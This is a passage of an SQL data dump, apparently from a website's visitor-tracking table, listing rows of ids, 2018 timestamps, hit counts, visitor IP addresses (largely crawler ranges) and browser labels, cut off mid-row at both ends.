10,1534405667,1,1,0,0,'54.36.148.211','other'),(288811,1534405953,1,1,0,0,'54.36.149.35','other'),(288812,1534405986,1,1,0,0,'216.244.66.241','other'),(288813,1534406183,1,1,0,0,'54.36.148.133','other'),(288814,1534406272,1,1,0,0,'8.29.198.25','other'),(288815,1534407251,1,1,0,0,'54.36.149.37','other'),(288816,1534407440,1,1,0,0,'54.36.148.232','other'),(288817,1534407556,1,1,0,0,'54.36.148.38','other'),(288818,1534407604,1,1,0,0,'54.36.148.25','other'),(288819,1534407686,1,1,0,0,'54.36.148.24','other'),(288820,1534407715,1,1,0,0,'54.36.149.58','other'),(288821,1534407798,1,1,0,0,'216.244.66.241','other'),(288822,1534407956,1,1,0,0,'37.9.113.182','other'),(288823,1534408196,1,1,0,0,'95.134.62.223','chrome'),(288824,1534408238,1,1,0,0,'54.36.148.110','other'),(288825,1534408398,1,1,0,0,'40.77.167.158','other'),(288826,1534408463,1,1,0,0,'54.36.148.223','other'),(288827,1534408467,1,1,0,0,'8.29.198.26','other'),(288828,1534408496,1,1,0,0,'54.36.148.213','other'),(288829,1534408604,1,1,0,0,'54.36.148.107','other'),(288830,1534408900,1,1,0,0,'91.196.178.94','chrome'),(288831,1534409020,1,1,0,0,'54.36.148.165','other'),(288832,1534409316,1,1,0,0,'54.36.149.25','other'),(288833,1534409469,1,1,0,0,'54.36.148.173','other'),(288834,1534409532,1,1,0,0,'95.163.255.163','other'),(288835,1534409956,1,1,0,0,'54.36.148.172','other'),(288836,1534410187,1,1,0,0,'54.36.148.127','other'),(288837,1534410202,1,1,0,0,'54.36.149.8','other'),(288838,1534410489,1,1,0,0,'141.8.142.74','other'),(288839,1534410500,1,1,0,0,'87.250.224.46','other'),(288840,1534410549,1,1,0,0,'40.77.167.125','other'),(288841,1534410932,1,1,0,0,'54.36.148.14','other'),(288842,1534410966,1,1,0,0,'54.36.149.73','other'),(288843,1534410995,1,1,0,0,'216.244.66.241','other'),(288844,1534411422,1,1,0,0,'178.154.171.88','other'),(288845,1534411433,1,1,0,0,'54.36.148.101','other'),(288846,1534411462,1,1,0,0,'54.36.149.5','other'),(288847,1534411521,1,1,0,0,'54.36.148.20','other'),(288848,1534411588,1,1,0,0,'54.36.148.37','other'),(288849,1534411613,1,1,0,0,'54.36.148.237','other'),(288850,1534411719,1,1,0,0,'91.196.178.169','chrome'),(288851,1534411737,1,1,0,0,'54.36.149.105','other'),(288852,1534411812,1,1,0,0,'54.36.148.42','other'),(288853,1534411871,1,1,0,0,'92.113.189.235','chrome'),(288854,1534412035,1,1,0,0,'54.36.149.67','other'),(288855,1534412313,1,1,0,0,'54.36.148.162','other'),(288856,1534412407,1,1,0,0,'54.36.148.43','other'),(288857,1534412628,1,1,0,0,'54.36.148.134','other'),(288858,1534412874,1,1,0,0,'54.36.149.0','other'),(288859,1534412902,1,1,0,0,'54.36.148.66','other'),(288860,1534412920,1,1,0,0,'54.36.148.200','other'),(288861,1534413154,1,1,0,0,'54.36.148.29','other'),(288862,1534413198,1,1,0,0,'54.36.148.61','other'),(288863,1534413325,1,1,0,0,'54.36.148.219','other'),(288864,1534413417,1,1,0,0,'54.36.148.229','other'),(288865,1534413484,1,1,0,0,'54.36.148.149','other'),(288866,1534413590,1,1,0,0,'54.36.148.250','other'),(288867,1534413783,1,1,0,0,'54.36.149.37','other'),(288868,1534413891,1,1,0,0,'54.36.148.89','other'),(288869,1534413951,1,1,0,0,'54.36.149.92','other'),(288870,1534414016,1,1,0,0,'216.244.66.241','other'),(288871,1534414274,1,1,0,0,'54.36.149.8','other'),(288872,1534414474,1,1,0,0,'54.36.149.11','other'),(288873,1534414520,1,1,0,0,'141.8.142.74','other'),(288874,1534414957,3,3,0,0,'157.55.39.248','other'),(288875,1534414965,2,2,0,0,'40.77.167.125','other'),(288876,1534415024,7,7,0,0,'40.77.167.158','other'),(288877,1534415321,1,1,0,0,'54.36.148.248','other'),(288878,1534415338,1,1,0,0,'54.36.149.76','other'),(288879,1534415560,1,1,0,0,'54.36.148.59','other'),(288880,1534416098,1,1,0,0,'54.36.148.232','other'),(288881,1534416647,1,1,0,0,'54.36.148.19','other'),(288882,1534416952,1,1,0,0,'54.36.148.93','other'),(288883,1534417032,1,0,1,0,'66.249.66.155',''),(288884,1534417064,2,2,0,0,'141.8.142.74','other'),(288885,1534417101,1,1,0,0,'8.29.198.27','other'),(288886,1534417443,1,1,0,0,'54.36.148.32','other'),(288887,1534417637,1,1,0,0,'54.36.149.74','other'),(288888,1534417911,1,1,0,0,'54.36.149.72','other'),(288889,1534418503,1,1,0,0,'54.36.148.31','other'),(288890,1534418523,1,1,0,0,'91.196.178.169','chrome'),(288891,1534418551,1,1,0,0,'54.36.148.20','other'),(288892,1534418588,1,1,0,0,'54.36.148.144','other'),(288893,1534418700,1,1,0,0,'54.36.148.83','other'),(288894,1534419115,2,2,0,0,'78.111.190.153','chrome'),(288895,1534419136,1,1,0,0,'54.36.148.120','other'),(288896,1534419295,1,1,0,0,'37.54.21.175','chrome'),(288897,1534419311,3,3,0,0,'141.8.142.74','other'),(288898,1534419324,1,1,0,0,'8.29.198.25','other'),(288899,1534419521,1,1,0,0,'54.36.149.48','other'),(288900,1534419701,1,1,0,0,'54.36.148.171','other'),(288901,1534419787,1,1,0,0,'54.36.148.199','other'),(288902,1534419941,2,2,0,0,'216.244.66.241','other'),(288903,1534419955,1,1,0,0,'54.36.149.65','other'),(288904,1534420094,1,1,0,0,'54.36.148.47','other'),(288905,1534420153,1,1,0,0,'54.36.149.3','other'),(288906,1534420198,1,1,0,0,'40.77.167.125','other'),(288907,1534420364,1,1,0,0,'178.154.171.88','other'),(288908,1534420374,1,1,0,0,'141.8.142.74','other'),(288909,1534420454,2,2,0,0,'91.196.178.177','chrome'),(288910,1534420461,1,1,0,0,'91.196.178.73','chrome'),(288911,1534420606,1,1,0,0,'37.9.113.101','other'),(288912,1534420721,1,1,0,0,'95.163.255.181','other'),(288913,1534420749,1,1,0,0,'54.36.148.137','other'),(288914,1534420857,1,1,0,0,'216.244.66.241','other'),(288915,1534420944,1,1,0,0,'95.163.255.184','other'),(288916,1534421087,1,1,0,0,'54.36.148.135','other'),(288917,1534421318,1,1,0,0,'54.36.149.40','other'),(288918,1534421484,2,2,0,0,'54.36.148.77','other'),(288919,1534421961,1,1,0,0,'95.163.255.152','other'),(288920,1534422124,3,3,0,0,'141.8.142.74','other'),(288921,1534422140,1,1,0,0,'54.36.149.83','other'),(288922,1534422416,1,1,0,0,'92.113.20.122','chrome'),(288923,1534422445,1,1,0,0,'54.36.148.89','other'),(288924,1534422789,1,1,0,0,'54.36.148.180','other'),(288925,1534422800,1,1,0,0,'95.163.255.177','other'),(288926,1534422844,1,1,0,0,'54.36.148.77','other'),(288927,1534422964,1,1,0,0,'54.36.149.47','other'),(288928,1534423008,1,1,0,0,'54.36.149.103','other'),(288929,1534423293,1,1,0,0,'216.244.66.241','other'),(288930,1534423329,1,1,0,0,'54.36.148.113','other'),(288931,1534423375,1,1,0,0,'54.36.148.33','other'),(288932,1534423501,1,1,0,0,'54.36.148.53','other'),(288933,1534423728,1,1,0,0,'54.36.149.7','other'),(288934,1534423770,1,1,0,0,'141.8.142.74','other'),(288935,1534423924,1,1,0,0,'54.36.148.204','other'),(288936,1534424309,1,1,0,0,'54.36.148.96','other'),(288937,1534424350,2,2,0,0,'91.196.178.71','chrome'),(288938,1534424359,1,1,0,0,'92.113.189.235','chrome'),(288939,1534424458,1,1,0,0,'46.211.25.138','chrome'),(288940,1534424695,1,1,0,0,'54.36.149.101','other'),(288941,1534424706,1,1,0,0,'54.36.148.64','other'),(288942,1534424801,1,1,0,0,'54.36.149.74','other'),(288943,1534424802,1,1,0,0,'54.36.149.45','other'),(288944,1534424890,1,1,0,0,'46.211.36.94','chrome'),(288945,1534425141,1,1,0,0,'216.244.66.241','other'),(288946,1534425240,1,1,0,0,'46.151.195.96','chrome'),(288947,1534425290,1,1,0,0,'91.196.178.81','firefox'),(288948,1534425337,1,1,0,0,'54.36.148.39','other'),(288949,1534425399,1,1,0,0,'54.36.148.161','other'),(288950,1534425433,1,1,0,0,'54.36.148.105','other'),(288951,1534425461,1,1,0,0,'54.36.148.188','other'),(288952,1534425474,1,1,0,0,'157.55.39.248','other'),(288953,1534425497,1,0,1,0,'66.249.66.156',''),(288954,1534425598,1,1,0,0,'92.113.189.235','chrome'),(288955,1534425781,1,1,0,0,'95.163.255.115','other'),(288956,1534425886,1,1,0,0,'54.36.148.179','other'),(288957,1534425968,2,2,0,0,'91.196.178.81','chrome'),(288958,1534426047,1,1,0,0,'54.36.148.130','other'),(288959,1534426543,1,1,0,0,'54.36.148.135','other'),(288960,1534426683,1,1,0,0,'54.36.149.14','other'),(288961,1534426863,1,1,0,0,'54.36.148.84','other'),(288962,1534426930,1,1,0,0,'54.36.149.52','other'),(288963,1534427187,1,1,0,0,'54.36.148.143','other'),(288964,1534427266,1,1,0,0,'54.36.148.203','other'),(288965,1534427670,1,1,0,0,'54.36.148.139','other'),(288966,1534427863,1,1,0,0,'54.36.148.239','other'),(288967,1534427933,1,1,0,0,'8.29.198.26','other'),(288968,1534428017,1,1,0,0,'54.36.149.91','other'),(288969,1534428072,1,1,0,0,'54.36.148.173','other'),(288970,1534428262,1,1,0,0,'54.36.148.50','other'),(288971,1534428289,1,1,0,0,'54.36.148.203','other'),(288972,1534428557,1,1,0,0,'178.251.107.33','chrome'),(288973,1534428838,2,2,0,0,'54.36.148.247','other'),(288974,1534429180,1,1,0,0,'54.36.148.55','other'),(288975,1534429325,1,1,0,0,'95.163.255.179','other'),(288976,1534429474,1,1,0,0,'141.8.142.74','other'),(288977,1534429548,1,1,0,0,'54.36.148.78','other'),(288978,1534429549,1,1,0,0,'54.36.148.13','other'),(288979,1534429794,1,1,0,0,'54.36.148.45','other'),(288980,1534429927,1,1,0,0,'54.36.148.226','other'),(288981,1534430192,1,1,0,0,'8.29.198.27','other'),(288982,1534430386,1,1,0,0,'141.8.142.74','other'),(288983,1534430421,1,1,0,0,'54.36.148.207','other'),(288984,1534430452,1,1,0,0,'54.36.149.92','other'),(288985,1534430532,1,1,0,0,'54.36.148.120','other'),(288986,1534430861,1,1,0,0,'54.36.148.151','other'),(288987,1534430952,1,1,0,0,'54.36.149.91','other'),(288988,1534431004,1,1,0,0,'54.36.148.223','other'),(288989,1534431183,1,1,0,0,'216.244.66.241','other'),(288990,1534431323,1,1,0,0,'54.36.148.178','other'),(288991,1534431343,1,1,0,0,'141.8.142.74','other'),(288992,1534431416,15,15,0,0,'96.44.183.124','other'),(288993,1534431435,1,1,0,0,'96.44.183.124','chrome'),(288994,1534431663,1,0,1,0,'66.249.66.157',''),(288995,1534431724,1,1,0,0,'54.36.148.19','other'),(288996,1534431776,1,1,0,0,'54.36.148.102','other'),(288997,1534431816,1,1,0,0,'188.230.43.254','other'),(288998,1534431847,1,1,0,0,'193.194.127.222','firefox'),(288999,1534432021,1,1,0,0,'54.36.148.221','other'),(289000,1534432068,1,1,0,0,'54.36.148.112','other'),(289001,1534432282,1,1,0,0,'54.36.148.79','other'),(289002,1534432489,1,1,0,0,'54.36.148.64','other'),(289003,1534432613,1,1,0,0,'40.77.167.49','other'),(289004,1534432716,1,1,0,0,'95.163.255.182','other'),(289005,1534432830,1,1,0,0,'54.36.148.92','other'),(289006,1534432972,1,1,0,0,'178.154.171.88','other'),(289007,1534433008,1,1,0,0,'95.163.255.162','other'),(289008,1534433199,1,1,0,0,'54.36.148.140','other'),(289009,1534433235,1,1,0,0,'54.36.148.38','other'),(289010,1534433264,1,1,0,0,'62.205.134.182','msie'),(289011,1534433308,2,2,0,0,'87.250.224.46','other'),(289012,1534433774,1,1,0,0,'54.36.148.188','other'),(289013,1534433813,1,1,0,0,'91.196.178.84','chrome'),(289014,1534433912,2,2,0,0,'54.36.148.251','other'),(289015,1534434312,1,0,1,0,'66.249.66.156',''),(289016,1534434434,1,1,0,0,'188.230.43.254','other'),(289017,1534434672,1,1,0,0,'141.8.142.74','other'),(289018,1534434723,1,1,0,0,'54.36.148.18','other'),(289019,1534434898,1,1,0,0,'178.154.171.88','other'),(289020,1534434996,1,1,0,0,'54.36.148.227','other'),(289021,1534435055,1,1,0,0,'54.36.148.223','other'),(289022,1534435184,1,1,0,0,'54.36.149.6','other'),(289023,1534435225,1,1,0,0,'40.77.167.158','other'),(289024,1534435247,2,2,0,0,'216.244.66.241','other'),(289025,1534435250,1,1,0,0,'157.55.39.248','other'),(289026,1534435251,1,1,0,0,'54.36.149.46','other'),(289027,1534435498,1,1,0,0,'54.36.148.102','other'),(289028,1534435574,1,1,0,0,'54.36.149.13','other'),(289029,1534436436,1,1,0,0,'216.244.66.241','other'),(289030,1534436511,1,1,0,0,'54.36.148.103','other'),(289031,1534436623,1,1,0,0,'188.230.43.254','other'),(289032,1534436643,1,1,0,0,'54.36.148.159','other'),(289033,1534437104,1,1,0,0,'54.36.148.113','other'),(289034,1534437108,1,1,0,0,'40.77.167.125','other'),(289035,1534437227,1,1,0,0,'54.36.148.146','other'),(289036,1534437292,1,1,0,0,'178.154.171.88','other'),(289037,1534437590,1,1,0,0,'54.36.148.159','other'),(289038,1534437741,1,1,0,0,'54.36.148.237','other'),(289039,1534437861,1,1,0,0,'92.113.189.235','chrome'),(289040,1534438206,1,1,0,0,'54.36.148.150','other'),(289041,1534438223,1,1,0,0,'54.36.148.140','other'),(289042,1534438622,1,1,0,0,'54.36.148.154','other'),(289043,1534438715,1,1,0,0,'91.196.178.99','other'),(289044,1534438765,1,1,0,0,'8.29.198.26','other'),(289045,1534438798,1,1,0,0,'54.36.149.48','other'),(289046,1534438868,1,1,0,0,'54.36.149.43','other'),(289047,1534438936,1,1,0,0,'40.77.167.49','other'),(289048,1534439022,1,1,0,0,'188.230.43.254','other'),(289049,1534439194,1,1,0,0,'95.163.255.168','other'),(289050,1534439281,1,1,0,0,'54.36.148.134','other'),(289051,1534439304,1,0,1,0,'66.249.66.76',''),(289052,1534439319,1,1,0,0,'66.249.66.74','chrome'),(289053,1534439787,1,1,0,0,'54.36.148.97','other'),(289054,1534439845,1,1,0,0,'54.36.148.164','other'),(289055,1534440039,1,1,0,0,'54.36.148.38','other'),(289056,1534440257,1,1,0,0,'54.36.149.85','other'),(289057,1534440378,1,1,0,0,'54.36.148.197','other'),(289058,1534440483,1,1,0,0,'54.36.148.111','other'),(289059,1534440520,1,1,0,0,'54.36.148.32','other'),(289060,1534440585,1,1,0,0,'54.36.149.79','other'),(289061,1534441053,1,1,0,0,'8.29.198.25','other'),(289062,1534441072,1,1,0,0,'54.36.148.125','other'),(289063,1534441138,1,1,0,0,'213.180.203.8','other'),(289064,1534441164,3,3,0,0,'141.8.142.74','other'),(289065,1534441204,1,1,0,0,'54.36.149.34','other'),(289066,1534441211,1,1,0,0,'54.36.148.244','other'),(289067,1534441265,1,1,0,0,'35.204.9.160','chrome'),(289068,1534441793,1,1,0,0,'54.36.149.46','other'),(289069,1534442026,1,1,0,0,'54.36.148.57','other'),(289070,1534442392,1,1,0,0,'54.36.148.101','other'),(289071,1534442444,1,1,0,0,'54.36.148.170','other'),(289072,1534442540,1,1,0,0,'54.36.148.241','other'),(289073,1534442545,1,1,0,0,'54.36.148.106','other'),(289074,1534442712,1,1,0,0,'54.36.149.107','other'),(289075,1534443075,1,1,0,0,'54.36.148.224','other'),(289076,1534443230,1,1,0,0,'54.36.149.86','other'),(289077,1534443231,1,1,0,0,'178.154.171.88','other'),(289078,1534443330,1,1,0,0,'54.36.148.130','other'),(289079,1534443348,1,1,0,0,'91.196.178.87','firefox'),(289080,1534443719,1,1,0,0,'54.36.148.54','other'),(289081,1534443865,1,1,0,0,'54.36.149.29','other'),(289082,1534443952,1,1,0,0,'54.36.148.68','other'),(289083,1534444185,1,1,0,0,'95.163.255.169','other'),(289084,1534444257,1,1,0,0,'66.249.66.156','chrome'),(289085,1534444391,1,1,0,0,'54.36.148.66','other'),(289086,1534444551,1,1,0,0,'54.36.148.181','other'),(289087,1534444669,2,2,0,0,'95.163.255.151','other'),(289088,1534444670,2,2,0,0,'91.196.178.97','chrome'),(289089,1534445033,2,0,2,0,'66.249.66.155',''),(289090,1534445105,1,1,0,0,'54.36.148.144','other'),(289091,1534445357,1,1,0,0,'54.36.149.65','other'),(289092,1534445543,2,2,0,0,'141.8.142.74','other'),(289093,1534445548,1,1,0,0,'54.36.148.135','other'),(289094,1534445719,1,1,0,0,'54.36.148.80','other'),(289095,1534445723,1,1,0,0,'54.36.148.237','other'),(289096,1534445897,1,1,0,0,'54.36.149.44','other'),(289097,1534446103,1,1,0,0,'54.36.149.29','other'),(289098,1534446180,1,1,0,0,'54.36.149.38','other'),(289099,1534446383,1,1,0,0,'54.36.148.31','other'),(289100,1534446401,1,1,0,0,'54.36.149.89','other'),(289101,1534446517,1,1,0,0,'54.36.149.51','other'),(289102,1534446888,1,1,0,0,'54.36.148.116','other'),(289103,1534447567,1,1,0,0,'141.8.142.74','other'),(289104,1534447601,2,0,2,0,'66.249.66.156',''),(289105,1534448248,1,1,0,0,'157.55.39.92','other'),(289106,1534448373,1,1,0,0,'54.36.148.129','other'),(289107,1534448457,3,0,3,0,'66.249.66.157',''),(289108,1534448774,1,1,0,0,'54.36.148.124','other'),(289109,1534448806,1,1,0,0,'54.36.148.242','other'),(289110,1534448816,1,1,0,0,'157.55.39.237','other'),(289111,1534449128,1,1,0,0,'178.154.171.88','other'),(289112,1534449133,1,1,0,0,'54.36.148.63','other'),(289113,1534449140,1,1,0,0,'141.8.142.74','other'),(289114,1534449208,1,1,0,0,'54.36.149.95','other'),(289115,1534449255,1,1,0,0,'54.36.148.121','other'),(289116,1534449514,1,1,0,0,'54.36.148.26','other'),(289117,1534449591,1,1,0,0,'8.29.198.25','other'),(289118,1534449608,1,1,0,0,'54.36.148.64','other'),(289119,1534449697,1,1,0,0,'54.36.148.42','other'),(289120,1534449863,1,1,0,0,'95.163.255.193','other'),(289121,1534449897,1,1,0,0,'95.163.255.178','other'),(289122,1534449986,1,1,0,0,'54.36.149.97','other'),(289123,1534450005,1,1,0,0,'54.36.148.173','other'),(289124,1534450125,1,1,0,0,'54.36.148.84','other'),(289125,1534450141,1,1,0,0,'95.163.255.191','other'),(289126,1534450344,1,0,1,0,'66.249.66.155',''),(289127,1534450381,1,1,0,0,'54.36.148.149','other'),(289128,1534450404,1,1,0,0,'54.36.148.161','other'),(289129,1534450501,1,1,0,0,'54.36.148.169','other'),(289130,1534450658,1,1,0,0,'54.36.148.127','other'),(289131,1534450699,1,1,0,0,'54.36.149.38','other'),(289132,1534450782,1,1,0,0,'54.36.149.39','other'),(289133,1534451259,2,1,1,0,'66.249.66.155',''),(289134,1534451420,1,1,0,0,'54.36.148.49','other'),(289135,1534451431,1,1,0,0,'157.55.39.237','other'),(289136,1534451438,1,1,0,0,'54.36.149.98','other'),(289137,1534451457,1,1,0,0,'54.36.148.71','other'),(289138,1534451486,1,1,0,0,'54.36.148.28','other'),(289139,1534451914,1,1,0,0,'8.29.198.25','other'),(289140,1534452014,1,1,0,0,'54.36.149.70','other'),(289141,1534452015,1,1,0,0,'141.8.142.74','other'),(289142,1534452122,1,1,0,0,'54.36.148.165','other'),(289143,1534452221,1,0,1,0,'66.249.66.157',''),(289144,1534452277,1,1,0,0,'54.36.148.244','other'),(289145,1534452527,1,1,0,0,'54.36.149.73','other'),(289146,1534452659,1,1,0,0,'54.36.148.212','other'),(289147,1534452670,1,1,0,0,'54.36.148.147','other'),(289148,1534452741,1,1,0,0,'54.36.149.38','other'),(289149,1534452848,1,1,0,0,'54.36.148.188','other'),(289150,1534452871,1,1,0,0,'54.36.148.95','other'),(289151,1534452877,1,1,0,0,'54.36.149.80','other'),(289152,1534453034,1,1,0,0,'54.36.148.165','other'),(289153,1534453389,1,1,0,0,'54.36.149.81','other'),(289154,1534453395,1,1,0,0,'54.36.148.133','other'),(289155,1534453519,1,1,0,0,'216.244.66.241','other'),(289156,1534453887,1,1,0,0,'54.36.148.106','other'),(289157,1534453995,1,1,0,0,'54.36.149.18','other'),(289158,1534454205,1,1,0,0,'54.36.148.239','other'),(289159,1534454338,1,1,0,0,'54.36.148.148','other'),(289160,1534454396,1,1,0,0,'54.36.148.232','other'),(289161,1534454644,1,1,0,0,'157.55.39.92','other'),(289162,1534454650,1,1,0,0,'54.36.148.245','other'),(289163,1534454737,1,1,0,0,'54.36.149.43','other'),(289164,1534454881,1,1,0,0,'54.36.148.188','other'),(289165,1534455045,1,1,0,0,'54.36.148.27','other'),(289166,1534455470,1,1,0,0,'95.163.255.155','other'),(289167,1534455630,1,1,0,0,'216.244.66.241','other'),(289168,1534455857,1,1,0,0,'157.55.39.248','other'),(289169,1534455875,1,1,0,0,'54.36.148.106','other'),(289170,1534455901,1,1,0,0,'54.36.148.245','other'),(289171,1534455933,1,1,0,0,'54.36.148.81','other'),(289172,1534455964,1,1,0,0,'54.36.148.222','other'),(289173,1534456287,1,1,0,0,'54.36.148.80','other'),(289174,1534456430,1,1,0,0,'54.36.148.116','other'),(289175,1534456612,1,1,0,0,'95.163.255.182','other'),(289176,1534456654,1,1,0,0,'216.244.66.241','other'),(289177,1534456696,1,1,0,0,'54.36.148.108','other'),(289178,1534456768,1,1,0,0,'54.36.149.13','other'),(289179,1534456896,1,1,0,0,'54.36.148.100','other'),(289180,1534457096,1,1,0,0,'54.36.148.73','other'),(289181,1534457202,1,1,0,0,'54.36.148.148','other'),(289182,1534457223,1,1,0,0,'54.36.148.210','other'),(289183,1534457288,1,1,0,0,'141.8.142.74','other'),(289184,1534457492,1,1,0,0,'95.163.255.166','other'),(289185,1534457516,1,1,0,0,'54.36.149.51','other'),(289186,1534457746,1,1,0,0,'54.36.148.125','other'),(289187,1534458111,1,1,0,0,'66.249.66.156','chrome'),(289188,1534458174,1,1,0,0,'54.36.148.212','other'),(289189,1534458491,1,1,0,0,'141.8.142.74','other'),(289190,1534458735,1,1,0,0,'54.36.148.253','other'),(289191,1534458967,1,1,0,0,'54.36.148.67','other'),(289192,1534459196,1,1,0,0,'54.36.148.103','other'),(289193,1534459336,1,1,0,0,'54.36.148.125','other'),(289194,1534459435,1,1,0,0,'54.36.149.107','other'),(289195,1534459647,1,1,0,0,'54.36.148.15','other'),(289196,1534459902,1,1,0,0,'54.36.149.54','other'),(289197,1534460043,1,1,0,0,'54.36.149.69','other'),(289198,1534460094,2,2,0,0,'54.36.148.121','other'),(289199,1534460105,1,1,0,0,'54.36.148.187','other'),(289200,1534460133,1,1,0,0,'54.36.148.229','other'),(289201,1534460434,1,1,0,0,'8.29.198.27','other'),(289202,1534460465,1,1,0,0,'54.36.148.250','other'),(289203,1534460471,1,1,0,0,'95.163.255.196','other'),(289204,1534460913,1,0,1,0,'66.249.66.155',''),(289205,1534460957,1,1,0,0,'54.36.148.22','other'),(289206,1534461029,1,1,0,0,'95.163.255.166','other'),(289207,1534461265,1,1,0,0,'54.36.149.55','other'),(289208,1534461292,2,2,0,0,'54.36.148.172','other'),(289209,1534461336,1,1,0,0,'54.36.149.88','other'),(289210,1534461349,1,1,0,0,'54.36.148.135','other'),(289211,1534461368,1,1,0,0,'54.36.148.46','other'),(289212,1534461385,1,1,0,0,'95.163.255.169','other'),(289213,1534461471,1,1,0,0,'54.36.148.225','other'),(289214,1534461510,1,1,0,0,'216.244.66.241','other'),(289215,1534461538,1,1,0,0,'54.36.148.183','other'),(289216,1534461732,2,2,0,0,'54.36.148.50','other'),(289217,1534461798,1,1,0,0,'66.249.66.156','chrome'),(289218,1534461914,1,1,0,0,'54.36.149.28','other'),(289219,1534461943,1,1,0,0,'54.36.148.255','other'),(289220,1534461955,1,1,0,0,'54.36.148.171','other'),(289221,1534461964,1,1,0,0,'54.36.148.126','other'),(289222,1534462047,1,1,0,0,'178.154.171.88','other'),(289223,1534462052,1,1,0,0,'54.36.148.147','other'),(289224,1534462072,1,1,0,0,'54.36.148.131','other'),(289225,1534462154,1,1,0,0,'207.46.13.117','other'),(289226,1534462158,1,1,0,0,'157.55.39.107','other'),(289227,1534462236,1,1,0,0,'54.36.148.169','other'),(289228,1534462457,1,1,0,0,'40.77.167.14','other'),(289229,1534462493,2,2,0,0,'54.36.148.72','other'),(289230,1534462568,1,1,0,0,'141.8.142.74','other'),(289231,1534462774,1,1,0,0,'8.29.198.27','other'),(289232,1534463198,1,0,1,0,'66.249.66.155',''),(289233,1534463544,1,1,0,0,'54.36.148.179','other'),(289234,1534463646,1,1,0,0,'54.36.148.108','other'),(289235,1534463699,1,1,0,0,'54.36.149.83','other'),(289236,1534463791,1,1,0,0,'54.36.149.64','other'),(289237,1534464099,1,1,0,0,'54.36.148.197','other'),(289238,1534464172,1,1,0,0,'54.36.148.145','other'),(289239,1534464407,1,1,0,0,'54.36.148.21','other'),(289240,1534464456,1,0,1,0,'66.249.66.155',''),(289241,1534464716,1,1,0,0,'54.36.148.118','other'),(289242,1534464758,1,1,0,0,'87.250.224.46','other'),(289243,1534464857,1,1,0,0,'54.36.148.107','other'),(289244,1534464984,1,1,0,0,'54.36.148.71','other'),(289245,1534465151,1,1,0,0,'54.36.148.183','other'),(289246,1534465185,1,1,0,0,'54.36.148.89','other'),(289247,1534465322,1,1,0,0,'54.36.148.105','other'),(289248,1534465344,1,1,0,0,'141.8.142.74','other'),(289249,1534465417,1,1,0,0,'95.163.255.165','other'),(289250,1534465571,1,1,0,0,'54.36.148.92','other'),(289251,1534466080,1,1,0,0,'54.36.148.45','other'),(289252,1534466116,1,1,0,0,'54.36.148.198','other'),(289253,1534466500,1,1,0,0,'54.36.149.3','other'),(289254,1534466659,1,1,0,0,'216.244.66.241','other'),(289255,1534466906,1,1,0,0,'178.154.171.88','other'),(289256,1534466933,1,1,0,0,'95.163.255.151','other'),(289257,1534467034,1,1,0,0,'54.36.149.41','other'),(289258,1534467119,1,1,0,0,'95.163.255.187','other'),(289259,1534467473,1,1,0,0,'54.36.149.50','other'),(289260,1534467567,1,1,0,0,'54.36.148.145','other'),(289261,1534467610,1,1,0,0,'54.36.148.83','other'),(289262,1534467688,1,1,0,0,'54.36.148.213','other'),(289263,1534467738,1,1,0,0,'54.36.148.58','other'),(289264,1534467997,1,1,0,0,'54.36.149.51','other'),(289265,1534468104,1,0,1,0,'66.249.66.61',''),(289266,1534468165,1,1,0,0,'54.36.149.26','other'),(289267,1534468446,1,1,0,0,'95.163.255.154','other'),(289268,1534468636,1,1,0,0,'54.36.148.102','other'),(289269,1534468705,1,1,0,0,'54.36.149.74','other'),(289270,1534468740,1,1,0,0,'157.55.39.248','other'),(289271,1534468862,1,1,0,0,'87.250.224.46','other'),(289272,1534468935,1,1,0,0,'54.36.148.154','other'),(289273,1534469005,1,1,0,0,'141.8.142.74','other'),(289274,1534469007,1,1,0,0,'37.9.113.182','other'),(289275,1534469009,1,1,0,0,'54.36.148.74','other'),(289276,1534469100,2,2,0,0,'216.244.66.241','other'),(289277,1534469147,2,2,0,0,'54.36.148.196','other'),(289278,1534469201,1,1,0,0,'54.36.148.34','other'),(289279,1534469439,11,11,0,0,'157.55.39.237','other'),(289280,1534469684,1,0,1,0,'66.249.66.156',''),(289281,1534469806,1,0,1,0,'66.249.66.61',''),(289282,1534470097,1,1,0,0,'54.36.148.148','other'),(289283,1534470129,1,1,0,0,'54.36.149.64','other'),(289284,1534470157,1,1,0,0,'54.36.149.37','other'),(289285,1534470194,1,1,0,0,'54.36.148.160','other'),(289286,1534470266,1,1,0,0,'54.36.148.11','other'),(289287,1534470267,7,7,0,0,'157.55.39.92','other'),(289288,1534470289,4,4,0,0,'157.55.39.248','other'),(289289,1534470323,1,1,0,0,'54.36.149.8','other'),(289290,1534470365,1,1,0,0,'52.34.24.33','chrome'),(289291,1534470951,1,1,0,0,'54.36.149.30','other'),(289292,1534471097,2,0,2,0,'66.249.66.157',''),(289293,1534471106,1,1,0,0,'54.36.149.0','other'),(289294,1534471166,1,1,0,0,'54.36.148.110','other'),(289295,1534471224,1,0,1,0,'66.249.66.156',''),(289296,1534471260,1,1,0,0,'8.29.198.25','other'),(289297,1534471292,1,1,0,0,'54.36.148.68','other'),(289298,1534471474,1,1,0,0,'54.36.148.189','other'),(289299,1534471498,1,1,0,0,'54.36.149.86','other'),(289300,1534471620,1,1,0,0,'141.8.142.74','other'),(289301,1534471719,1,1,0,0,'91.209.11.236','other'),(289302,1534471966,1,1,0,0,'208.110.93.52','other'),(289303,1534472110,1,1,0,0,'95.163.255.164','other'),(289304,1534472139,1,1,0,0,'54.36.148.20','other'),(289305,1534472496,1,1,0,0,'54.36.148.74','other'),(289306,1534472521,1,1,0,0,'54.36.148.148','other'),(289307,1534472800,1,1,0,0,'54.36.148.127','other'),(289308,1534472950,1,1,0,0,'54.36.148.247','other'),(289309,1534473033,1,1,0,0,'54.36.149.56','other'),(289310,1534473080,1,1,0,0,'54.36.148.161','other'),(289311,1534473136,1,1,0,0,'95.163.255.181','other'),(289312,1534473215,1,0,1,0,'66.249.66.156',''),(289313,1534473419,1,1,0,0,'54.36.148.49','other'),(289314,1534473469,1,1,0,0,'91.209.11.236','other'),(289315,1534473487,1,1,0,0,'54.36.148.233','other'),(289316,1534473532,1,1,0,0,'178.154.171.88','other'),(289317,1534473615,1,1,0,0,'8.29.198.26','other'),(289318,1534473675,1,1,0,0,'54.36.148.234','other'),(289319,1534473800,1,0,1,0,'66.249.66.59',''),(289320,1534473812,1,1,0,0,'66.249.66.57','chrome'),(289321,1534473889,1,1,0,0,'54.36.148.230','other'),(289322,1534473993,1,1,0,0,'54.36.148.176','other'),(289323,1534474257,1,0,1,0,'66.249.66.155',''),(289324,1534474405,2,2,0,0,'91.196.178.61','chrome'),(289325,1534474406,1,1,0,0,'54.36.